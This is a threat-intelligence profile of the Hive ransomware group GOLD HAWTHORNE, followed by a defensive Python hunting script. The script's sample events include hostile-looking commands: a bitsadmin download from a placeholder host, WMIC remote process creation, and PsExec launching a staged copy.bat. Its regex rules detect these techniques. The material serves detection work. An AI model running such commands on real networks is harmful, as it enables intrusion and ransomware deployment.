GOLD HAWTHORNE
SUMMARY
GOLD HAWTHORNE is a financially motivated threat group responsible for the development and distribution of the Hive ransomware. From June 2021, Hive was used in post-intrusion ransomware attacks incorporating 'name-and-shame' data theft tactics. GOLD HAWTHORNE operated Hive as a ransomware-as-a-service (RaaS), using affiliates to gain access to victim networks and deploy the ransomware. Hive ransomware intrusions have been characterised by the use of Cobalt Strike, SystemBC, Metasploit, and a number of legitimate tools including ProcDump, PCHunter64, GMER and the Ntdsutil utility.
CTU researchers have observed Hive distributed using techniques previously associated with GOLD ULRICK's Ryuk and Conti intrusions, such as the use of PsExec and a copy.bat batch script, WMI, BITSAdmin, and tool staging in a C:\Share$ directory on compromised domain controllers. This behavior could mean that GOLD ULRICK or one of its affiliates was using Hive. Alternatively, GOLD HAWTHORNE affiliates may have been copying publicly documented techniques used by GOLD ULRICK.
On January 26, 2023, the U.S. Department of Justice (DoJ) and Federal Bureau of Investigation (FBI) issued a statement describing the international law enforcement cooperation that resulted in the seizure of some infrastructure associated with the Hive ransomware operation. The statement claimed that Hive ransomware had been used against 1,500 victims since GOLD HAWTHORNE started operating in mid-2021. This is considerably more than the 209 victims listed on its leak site, indicating that the number of victims a ransomware group chooses to name may be considerably lower than the actual number.
Later in 2023, third-party researchers identified significant similarities between Hive ransomware and a new ransomware variant used by a group calling itself Hunters International. This led to speculation that the new scheme might be a rebrand of Hive, an assertion that members of Hunters International subsequently denied, claiming instead to have purchased and repurposed the source code. Although it is possible that Hunters International is a rebrand of Hive, CTU researchers track it as a different cluster of activity under the GOLD CRESCENT threat group.
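The distribution techniques listed above (PsExec launching copy.bat, WMI remote execution, BITSAdmin transfers, staging under C:\Share$ on domain controllers) lend themselves to simple hunting rules. The following is an added example, not CTU tooling: it runs a handful of rules over constructed process- and file-creation events with hypothetical field names (host, type, image, cmdline, path) and raises the severity of staging-related hits on hosts the analyst lists as domain controllers.

```python
import re

# Constructed sample telemetry; field names are hypothetical, not a real product schema.
SAMPLE_EVENTS = [
    {"host": "DC01", "type": "process", "image": "C:\\Windows\\PSEXESVC.exe",
     "cmdline": 'cmd.exe /c "C:\\Share$\\copy.bat"'},
    {"host": "DC01", "type": "file", "path": "C:\\Share$\\stage.dll"},
    {"host": "WS07", "type": "process", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download http://PLACEHOLDER/x.exe C:\\Users\\Public\\x.exe"},
    {"host": "WS07", "type": "process", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic /node:WS08 process call create cmd.exe"},
    {"host": "WS09", "type": "process", "image": "C:\\Program Files\\Backup\\backup.exe",
     "cmdline": "backup.exe --full"},  # benign, must not match any rule
]

def _proc(e):
    return e["type"] == "process"

# (rule name, predicate, True if the rule concerns tool staging on the host)
RULES = [
    ("psexec_copy_bat",
     lambda e: _proc(e) and "psexesvc" in e["image"].lower()
     and "copy.bat" in e["cmdline"].lower(), True),
    ("share_dollar_staging",
     lambda e: e["type"] == "file"
     and e["path"].lower().startswith("c:\\share$\\"), True),
    ("bitsadmin_transfer",
     lambda e: _proc(e) and re.search(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b",
                                      e["cmdline"], re.I) is not None, False),
    ("wmic_remote_exec",
     lambda e: _proc(e) and re.search(r"\bwmic(\.exe)?\b.*/node:.*process\s+call\s+create",
                                      e["cmdline"], re.I) is not None, False),
]

def hunt(events, domain_controllers=()):
    """Return one finding per (event, rule) match. Staging rules firing on a
    domain controller are rated high, since that matches the observed tradecraft."""
    dcs = {h.lower() for h in domain_controllers}
    findings = []
    for e in events:
        for name, match, staging in RULES:
            if match(e):
                on_dc = e["host"].lower() in dcs
                findings.append({"host": e["host"], "rule": name,
                                 "severity": "high" if staging and on_dc else "medium"})
    return findings
```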